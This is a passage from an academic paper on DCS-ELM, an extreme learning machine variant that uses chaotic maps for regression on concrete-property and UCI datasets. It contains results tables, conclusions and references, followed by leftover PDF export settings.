10.7717/peerj-cs.411/fig-12 Figure 13 Comparison of ELM and DCS-ELM algorithms according to the MAE value in experiments. Full-size DOI: 10.7717/peerj-cs.411/fig-13 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 24/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-12 http://dx.doi.org/10.7717/peerj-cs.411/fig-13 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ than the logistic map-based DCS-ELM algorithm, 18.6% better than the basic ELM algorithm, 10.92% better than the tent map-based DCS-ELM, 9.87% better than the Chebyshev map-based DCS-ELM algorithm and 5.42% better than the piecewise map- based DCS-ELM algorithm. In the compressive strength experiment, the piecewise map-based DCS-ELM algorithm, which gives the best performance according to the MAE evaluation criteria, is 31.32% better than the Chebyshev map-based DCS-ELM algorithm, 19.17% better than the basic ELM algorithm, 11.63% better than the iterative map-based DCS-ELM, 6.57% better than the tent map-based DCS-ELM algorithm and 0.31% better than the logistic map-based DCS-ELM algorithm. It has been demonstrated that the DCS-ELM algorithm produces better results than the ELM algorithm in all SFRSCC data sets. General comparison of all data sets As a result of the study, it was observed that the use of chaotic maps in the ELM algorithm increased the success performance in the SFRSCC and public data sets. However, there is Table 13 Results of all datasets. EM LR SVR WELM k = 100 KELM k = 100 ELM k = 100 DCS-ELM Chebyshev DCS-ELM Iterative DCS-ELM Logistic DCS-ELM Piecewise DCS-ELM Tent Energy1 R2 0.92 0.91 0.9336 0.9055 0.9809 0.8672 0.9905 0.8723 0.9826 0.9794 RMSE 2.9421 2.09736 2.5596 3.0598 1.5470 5.5700 1.2450 4.9494 1.6421 1.2402 MAE 2.0877 2.0435 1.9333 2.3510 1.0524 3.1354 0.8039 2.8124 1.0862 0.8969 Energy2 R2 0.89 0.88 0.9516 0.8838 0.9730 0.9478 0.9779 0.9626 0.9708 0.9636 RMSE 3.2188 3.2484 2.0968 3.1851 2.0885 2.2023 1.7219 2.4084 1.9607 2.6307 MAE 2.2643 2.2441 1.5415 2.3735 1.1709 1.5281 1.0744 1.5189 1.1168 1.2881 House R2 0.57 0.56 0.6041 0 0.5677 0.5932 0.6087 0.5676 0.6143 0.5292 RMSE 8.9474 9.041 8.0768 29.2569 7.3118 7.2347 6.6873 7.4086 6.5335 7.2982 MAE 6.2745 6.2238 5.7113 24.6785 5.5837 5.7505 5.0731 5.7930 5.2752 5.7343 Servo R2 0.48 0.17 0.4936 0.6997 0.7893 0.7189 0.8271 0.2270 0.8265 0.7924 RMSE 1.1348 1.4304 1.0887 0.7698 0.4511 0.5118 0.3574 0.8743 0.6183 0.3832 MAE 0.9169 0.7850 0.7978 0.5153 0.3549 0.4323 0.2626 0.6280 0.4905 0.2798 Vfunnel R2 0.7820 0.8011 0.6995 0.6746 0.6617 0.6894 0.7056 0.6949 0.6794 0.6656 RMSE 2.2727 2.1707 2.4589 2.6789 2.8365 2.4968 2.0798 2.8948 2.7398 2.8453 MAE 1.8330 1.7657 1.9675 2.2002 2.0797 2.2025 1.6262 2.4825 2.1089 2.5755 T50 R2 0.7669 0.7705 0.8569 0.7577 0.8565 0.8499 0.8533 0.8687 0.8665 0.8528 RMSE 2.2360 2.2190 1.5121 2.1675 1.0099 0.9122 1.0020 0.8541 1.0644 1.0727 MAE 1.6917 1.5372 0.9690 1.6974 0.7960 0.7198 0.7318 0.6539 0.8750 0.7789 Slump-flow R2 0.6123 0.6607 0.6247 0.4873 0.6324 0.6862 0.6999 0.6453 0.6942 0.6251 RMSE 3.8928 3.6417 3.3328 4.4134 2.7543 2.4183 2.1685 2.8308 2.1747 3.0299 MAE 2.9481 2.6285 2.3177 3.3497 1.9247 1.7383 1.5668 2.0878 1.4862 1.7589 fc R2 0.7307 0.7630 0.7541 0.7298 0.7604 0.7905 0.8183 0.7882 0.8235 0.7750 RMSE 6.5560 6.1514 5.1207 5.9819 5.5749 6.2847 5.2188 4.4419 4.8539 4.8080 MAE 4.6861 4.3750 3.8332 4.5412 4.1536 4.8892 3.7992 3.3678 3.3575 3.5935 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 25/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ no clear superiority between five different maps. The performance rankings of chaotic maps vary according to the evaluation criteria and the type of data set. When it will be adapted to different data sets, it is recommended to determine the chaotic map by trial and error method. The results of all methods and data sets used in the article are given in Table 13. Table 14 shows the success rankings of the algorithms used in 8 different data sets. When the average values were taken according to 8 different data sets, it was seen that the iterative chaotic map based DCS-ELM method achieved the best average. Piecewise map-based DCS-ELM method took the second place. It has been observed that DCS-ELM gives better results than LR, SVR, WELM and KELM algorithms. It has been observed that the DCS-ELM method gives a much better performance as a percentage, especially in data sets where the ELM method has a low performance rate. CONCLUSIONS In this study, a novel method named DCS-ELM is proposed to improve the ELM algorithm. In this proposed method, 5 different chaotic maps are used. These chaotic maps are Chebyshev map, iterative map, logistic map, piecewise map and tent map. It has been shown that the performance of the DCS-ELM algorithm changes according to the chaotic map used. The DCS-ELM method proposed in this study has been tested in 8 different data sets. The common parameters of the models designed in each data set are used the same. In addition, the test and training data sets used during the testing of the models were used the same. As a result of the study, it was observed that the DCS-ELM algorithm is more stable, problem solving ability is more generalized and higher performance thanks to the use of chaotic maps in the ELM algorithm. Especially in datasets where ELM or other algorithms showed poor performance, DCS-ELM algorithm was able to perform better than basic ELM, KELM, WELM, LR and SVR. It has been shown that problems such as accumulating randomly assigned number values in a certain place and repeating numbers can be prevented by using chaotic maps. The DCS-ELM algorithm is provided to reach the best performance faster. The proposed discrete-time chaotic systems extreme learning machine algorithm can be appropriately used in regression problems. Novel discrete time chaotic systems based machine learning Table 14 Ranking of algorithms according to RMSE value. LR SVR WELM k = 100 KELM k = 100 ELM k = 100 DCS-ELM Chebyshev DCS-ELM Iterative DCS-ELM Logistic DCS-ELM Piecewise DCS-ELM Tent Energy1 7 5 6 8 3 10 2 9 4 1 Energy2 9 10 4 8 3 5 1 6 2 7 House 8 9 7 10 5 3 2 6 1 4 Servo 9 10 8 6 3 4 1 7 5 2 Vfunnel 3 2 4 6 8 5 1 10 7 9 T50 10 9 7 8 4 2 3 1 5 6 Slump-flow 9 8 7 10 4 3 1 5 2 6 fc 10 8 4 7 6 9 5 1 3 2 Mean rank 8.13 7.63 5.88 7.88 4.50 5.13 2.00 5.63 3.63 4.63 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 26/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ algorithm can be effectively used in different complex datasets. These proposed methods are novel and more detailed work can be done with parallel or distributed application. In addition, different studies can be done by adapting the chaotic maps to different versions of the ELM algorithm. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Osman Altay conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Mustafa Ulas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Kursat Esat Alyamac conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Datasets and codes are available at GitHub: https://github.com/mustafaulas/DCS-ELM. Data is also available at the UCI Machine Learning Repository: - House dataset: https://archive.ics.uci.edu/ml/datasets/Real+estate+valuation+data+set. - Servo Dataset: https://archive.ics.uci.edu/ml/datasets/Servo. - Energy Dataset: https://archive.ics.uci.edu/ml/datasets/Energy+efficiency#. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.411#supplemental-information. REFERENCES Al-kazemi B, Mohan CK. 2002. Training feedforward neural networks using multi-phase particle swarm optimization. In: Proceedings of the 9th International Conference on Neural Information Processing, 2002. ICONIP’02. Vol. 5. Piscataway: IEEE, 2615–2619. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 27/31 https://github.com/mustafaulas/DCS-ELM https://archive.ics.uci.edu/ml/datasets/Real+estate+valuation+data+set https://archive.ics.uci.edu/ml/datasets/Servo https://archive.ics.uci.edu/ml/datasets/Energy+efficiency# http://dx.doi.org/10.7717/peerj-cs.411#supplemental-information http://dx.doi.org/10.7717/peerj-cs.411#supplemental-information http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ Alatas B. 2010. Chaotic bee colony algorithms for global numerical optimization. Expert Systems with Applications 37(8):5682–5687 DOI 10.1016/j.eswa.2010.02.042. Altay EV, Alatas B. 2020. Bird swarm algorithms with chaotic mapping. Artificial Intelligence Review 53(2):1373–1414 DOI 10.1007/s10462-019-09704-9. Altay O, Gurgenc T, Ulas M, Özel C. 2020. Prediction of wear loss quantities of ferro-alloy coating using different machine learning algorithms. Friction 8(1):107–114 DOI 10.1007/s40544-018-0249-z. Altay O, Ulas M. 2019. The use of kernel-based extreme learning machine and well-known classification algorithms for fall detection. In: Advances in Computer Communication and Computational Sciences. Singapore: Springer, 147–155. Altay O, Ulas M, Alyamac KE. 2020. Prediction of the fresh performance of steel fiber reinforced self-compacting concrete using quadratic SVM and weighted KNN models. IEEE Access 8:92647–92658 DOI 10.1109/ACCESS.2020.3037672. Arena P, Caponetto R, Fortuna L, Rizzo A, La Rosa M. 2000. Self-organization in nonrecurrent complex systems. International Journal of Bifurcation and Chaos 10(5):1115–1125 DOI 10.1142/S0218127400000785. Baykal N, Beyan T. 2004. Bulanık mantık: uzman sistemler ve denetleyiciler. Ankara: Bıçaklar Kitabevi. Berbergil V. 2006. Kendiliğinden Yerleşen Betonlarda Çelik Lif Kullanımının Işlenebilirliğe Etkisi. Ph.d thesis, İstanbul Teknik University, Turkey. Bilhan O, Emiroglu ME, Miller CJ, Ulas M. 2018. The evaluation of the effect of nappe breakers on the discharge capacity of trapezoidal labyrinth weirs by ELM and SVR approaches. Flow Measurement and Instrumentation 64(3):71–82 DOI 10.1016/j.flowmeasinst.2018.10.009. Bozkurt N. 2009. Fiber Takviyeli Kendiliğinden Yerleşen Betonun Mekanik ve Durabilite Özelliklerinin Araştırılması. Ph.d thesis, Fırat University, Turkey. Cao F, Yang Z, Ren J, Ling WK, Zhao H, Sun M, Benediktsson JA. 2018. Sparse representation- based augmented multinomial logistic extreme learning machine with weighted composite features for spectral-spatial classification of hyperspectral images. IEEE Transactions on Geoscience and Remote Sensing 56(11):6263–6279 DOI 10.1109/TGRS.2018.2828601. Caponetto R, Criscione M, Fortuna L, Occhipinti D, Occhipinti L. 1998. Programmable chaos generator, based on CNN architectures, with applications in chaotic communications. In: 1998 Fifth IEEE International Workshop on Cellular Neural Networks and their Applications. Proceedings (Cat. No. 98TH8359). Piscataway: IEEE, 124–129. Corinaldesi V, Moriconi G. 2009. Effect of different fibers and mineral additions on the performance of FRSCC. Farmington Hills: ACI Special Publication, 261. Deeb R. 2013. Flow of self-compacting concrete. Ph.d thesis, United Kingdom. Dinç A. 2007. Kendiliğinden Yerleşen Çelik Lif Donatılı Betonların Mekanik Davranışına Su/Ince Malzeme Oranı Ve Lif Dayanımının Etkisi. Ph.d thesis, İstanbul Teknik University, Turkey. Dua D, Graff C. 2019. UCI machine learning repository. Irvine: University of California, School of Information and Computer Science. El-Dieb AS, Taha MR. 2012. Flow characteristics and acceptance criteria of fiber-reinforced self-compacted concrete (FR-SCC). Construction and Building Materials 27(1):585–596 DOI 10.1016/j.conbuildmat.2011.07.004. Frazão C, Camões A, Barros J, Gonçalves D. 2015. Durability of steel fiber reinforced self-compacting concrete. Construction and Building Materials 80(4):155–166 DOI 10.1016/j.conbuildmat.2015.01.061. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 28/31 http://dx.doi.org/10.1016/j.eswa.2010.02.042 http://dx.doi.org/10.1007/s10462-019-09704-9 http://dx.doi.org/10.1007/s40544-018-0249-z http://dx.doi.org/10.1109/ACCESS.2020.3037672 http://dx.doi.org/10.1142/S0218127400000785 http://dx.doi.org/10.1016/j.flowmeasinst.2018.10.009 http://dx.doi.org/10.1109/TGRS.2018.2828601 http://dx.doi.org/10.1016/j.conbuildmat.2011.07.004 http://dx.doi.org/10.1016/j.conbuildmat.2015.01.061 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ Gencel O, Brostow W, Datashvili T, Thedford M. 2011. Workability and mechanical performance of steel fiber-reinforced self-compacting concrete with fly ash. Composite Interfaces 18(2):169–184 DOI 10.1163/092764411X567567. Gurgenc T, Altay O, Ulas M, Ozel C. 2020. Extreme learning machine and support vector regression wear loss predictions for magnesium alloys coated using various spray coating methods. Journal of Applied Physics 127(18):185103 DOI 10.1063/5.0004562. Huang F, Huang J, Jiang S, Zhou C. 2017. Landslide displacement prediction based on multivariate chaotic model and extreme learning machine. Engineering Geology 218:173–186 DOI 10.1016/j.enggeo.2017.01.016. Huang G, Huang GB, Song S, You K. 2015. Trends in extreme learning machines: a review. Neural Networks 61(1):32–48 DOI 10.1016/j.neunet.2014.10.001. Huang GB, Zhou H, Ding X, Zhang R. 2011. Extreme learning machine for regression and multiclass classification. IEEE Transactions on Systems, Man, and Cybernetics, Part B 42(2):513–529 DOI 10.1109/TSMCB.2011.2168604. Huang GB, Zhu QY, Siew CK. 2006. Extreme learning machine: theory and applications. Neurocomputing 70(1–3):489–501 DOI 10.1016/j.neucom.2005.12.126. Ilonen J, Kamarainen JK, Lampinen J. 2003. Differential evolution training algorithm for feed- forward neural networks. Neural Processing Letters 17(1):93–105. Jansson A, Löfgren I, Lundgren K, Gylltoft K, Lofgren I. 2012. Bond of reinforcement in self-compacting steel-fibre reinforced concrete bond of reinforcement in self-compacting steel- fibre-reinforced concrete. Magazine of Concrete Research 64(7):617–630 DOI 10.1680/macr.11.00091. Karaboga D, Akay B, Ozturk C. 2007. Artificial bee colony (ABC) optimization algorithm for training feed-forward neural networks. In: International Conference on Modeling Decisions for Artificial Intelligence. Berlin: Springer, 318–329. Kassimi F. 2013. Développement Et Performance Des Bétons Autoplaçants Fibrés Pour Les Applications de Réparation. Ph.d thesis, Canada. Korkmaz S. 2011. Kendiliğinden Yerleşen Lifli Betonların Çekme Elemanlarında Kullanılabilirliği. Master thesis, Ondokuz Mayıs University, Turkey. Korkut F, Türkmenoğlu ZF, Taymuş RB, Güler S. 2017. Çelik Ve Sentetik Liflerin Kendiliğinden Yerleşen Betonlarin Taze Ve Mekanik Özellikleri Üzerine Etkisi. Niğde Ömer Halisdemir University Mühendislik Bilimleri Dergisi 6(2):560–570. Long WJ, Lin HX, Chen ZR, Zhang KL, Wang WL. 2014. Mechanical properties of fiber reinforced self-compacting concrete. Applied Mechanics and Materials 470:797–801 DOI 10.4028/www.scientific.net/AMM.470.797. Majdzadeh F. 2003. Fracture toughness of hybrid fiber reinforced self-compacting concrete. Ph.D thesis, British Columbia University, United Kingdom. Mohanty F, Rup S, Dash B, Majhi B, Swamy MNS. 2020. An improved scheme for digital mammogram classification using weighted chaotic salp swarm algorithm-based kernel extreme learning machine. Applied Soft Computing 91(6Part1):106266 DOI 10.1016/j.asoc.2020.106266. Montana DJ, Davis L. 1989. Training feedforward neural networks using genetic algorithms. Proceedings of the 11th International Joint Conference on Artificial Intelligence 1:762–767. Nis A. 2017. Mechanical and Rheological Properties of Steel Fibre Reinforced Self-Compacting Concrete. Ph.d thesis, Boğaziçi University, Turkey. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 29/31 http://dx.doi.org/10.1163/092764411X567567 http://dx.doi.org/10.1063/5.0004562 http://dx.doi.org/10.1016/j.enggeo.2017.01.016 http://dx.doi.org/10.1016/j.neunet.2014.10.001 http://dx.doi.org/10.1109/TSMCB.2011.2168604 http://dx.doi.org/10.1016/j.neucom.2005.12.126 http://dx.doi.org/10.1680/macr.11.00091 http://dx.doi.org/10.4028/www.scientific.net/AMM.470.797 http://dx.doi.org/10.1016/j.asoc.2020.106266 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ Nozawa H. 1992. A neural network model as a globally coupled map and applications based on chaos. Chaos: An Interdisciplinary Journal of Nonlinear Science 2(3):377–386 DOI 10.1063/1.165880. Ouedraogo H. 2018. Lif Kullanımının Kendiliğinden Yerleşen Beton (Kyb) Karışımlarının Özelliklerine Etkisi. Master thesis, Uludağ University, Turkey. Ozer AB. 2010. CIDE: chaotically initialized differential evolution. Expert Systems with Applications 37(6):4632–4641 DOI 10.1016/j.eswa.2009.12.045. Pająk M, Ponikiewski T. 2013. Flexural behavior of self-compacting concrete reinforced with different types of steel fibers. Construction and Building Materials 47(7):397–408 DOI 10.1016/j.conbuildmat.2013.05.072. Quinlan JR. 1992. Learning with continuous classes. 5th Australian Joint Conference on Artificial Intelligence 92:343–348. Quinlan JR. 1993. Combining instance-based and model-based learning. In: Proceedings of the Tenth International Conference on Machine Learning. 236–243. Rao BK, Ravindra V. 2010. Steel fiber reinforced self-compacting concrete incorporating class F Fly Ash. International Journal of Engineering Science and Technology 2(9):4936–4943. Rumelhart DE, Hinton GE, Williams RJ. 1986. Learning representations by back-propagating errors. Nature 323(6088):533–536 DOI 10.1038/323533a0. Sahmaran M, Yaman IO. 2007. Hybrid fiber reinforced self-compacting concrete with a high- volume coarse fly ash. Construction and Building Materials 21(1):150–156 DOI 10.1016/j.conbuildmat.2005.06.032. Sahmaran M, Yurtseven A, Yaman IO. 2005. Workability of hybrid fiber reinforced self-compacting concrete. Building and Environment 40(12):1672–1677 DOI 10.1016/j.buildenv.2004.12.014. Silva DN, Pacifico LD, Ludermir TB. 2011. An evolutionary extreme learning machine based on group search optimization. In: 2011 IEEE Congress of Evolutionary Computation (CEC). Piscataway: IEEE, 574–580. Tezel OO. 2010. Tiplerdeki Çelik Ve Polipropilen Liflerin Kendiliginden ˇ Yerleşen Betonlarda İşlenebilirliğe Ve Mekanik Davranışa Etkisi. Master thesis, İstanbul Teknik University, Turkey. Torrijos MC, Barragan BE, Zerbino RL. 2008. Physical-mechanical properties, and mesostructure of plain and fibre reinforced self-compacting concrete. Construction and Building Materials 22(8):1780–1788 DOI 10.1016/j.conbuildmat.2007.05.008. Tsanas A, Xifara A. 2012. Accurate quantitative estimation of energy performance of residential buildings using statistical machine learning tools. Energy and Buildings 49(3):560–567 DOI 10.1016/j.enbuild.2012.03.003. Ulas M, Altay O, Gurgenc T, Ozel C. 2019. A new approach for prediction of the wear loss of PTA surface coatings using artificial neural network and basic, kernel-based, and weighted extreme learning machine. Friction 8:1102–1116. Wang M, Chen H, Yang B, Zhao X, Hu L, Cai ZN, Huang H, Tong C. 2017. Toward an optimal kernel extreme learning machine using a chaotic moth-flame optimization strategy with applications in medical diagnoses. Neurocomputing 267(1–3):69–84 DOI 10.1016/j.neucom.2017.04.060. Xu Y, Shu Y. 2006. Evolutionary extreme learning machine-based on particle swarm optimization. In: International Symposium on Neural Networks. Berlin: Springer, 644–652. Yang Z, Cao F, Zabalza J, Chen W, Cao J. 2018. Spectral and spatial kernel extreme learning machine for hyperspectral image classification. In: International Conference on Brain Inspired Cognitive Systems. Cham: Springer, 394–401. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 30/31 http://dx.doi.org/10.1063/1.165880 http://dx.doi.org/10.1016/j.eswa.2009.12.045 http://dx.doi.org/10.1016/j.conbuildmat.2013.05.072 http://dx.doi.org/10.1038/323533a0 http://dx.doi.org/10.1016/j.conbuildmat.2005.06.032 http://dx.doi.org/10.1016/j.buildenv.2004.12.014 http://dx.doi.org/10.1016/j.conbuildmat.2007.05.008 http://dx.doi.org/10.1016/j.enbuild.2012.03.003 http://dx.doi.org/10.1016/j.neucom.2017.04.060 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ Yang Y, Wang Y, Yuan X. 2013. Parallel chaos search based incremental extreme learning machine. Neural Processing Letters 37(3):277–301 DOI 10.1007/s11063-012-9246-9. Yeh IC, Hsu TK. 2018. Building real estate valuation models with comparative approach through case-based reasoning. Applied Soft Computing 65(4):260–271 DOI 10.1016/j.asoc.2018.01.029. Yıldırım H, Sertbaş B, Berbergil V. 2007. Kendiliğinden yerleşen betonlarda polipropilen ve çelik lif kullanılmasının işlenebilirliğe etkisi. In: Ulusal Beton Kongresi, 7:28–30. Zhu QY, Qin AK, Suganthan PN, Huang GB. 2005. Evolutionary extreme learning machine. Pattern Recognition 38(10):1759–1763 DOI 10.1016/j.patcog.2005.03.028. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 31/31 http://dx.doi.org/10.1007/s11063-012-9246-9 http://dx.doi.org/10.1016/j.asoc.2018.01.029 http://dx.doi.org/10.1016/j.patcog.2005.03.028 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ DCS-ELM: a novel method for extreme learning machine for regression problems and a new approach for the SFRSCC Introduction Extreme learning machine Gradient-based solution Least squares norm Datasets Results and discussion Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR 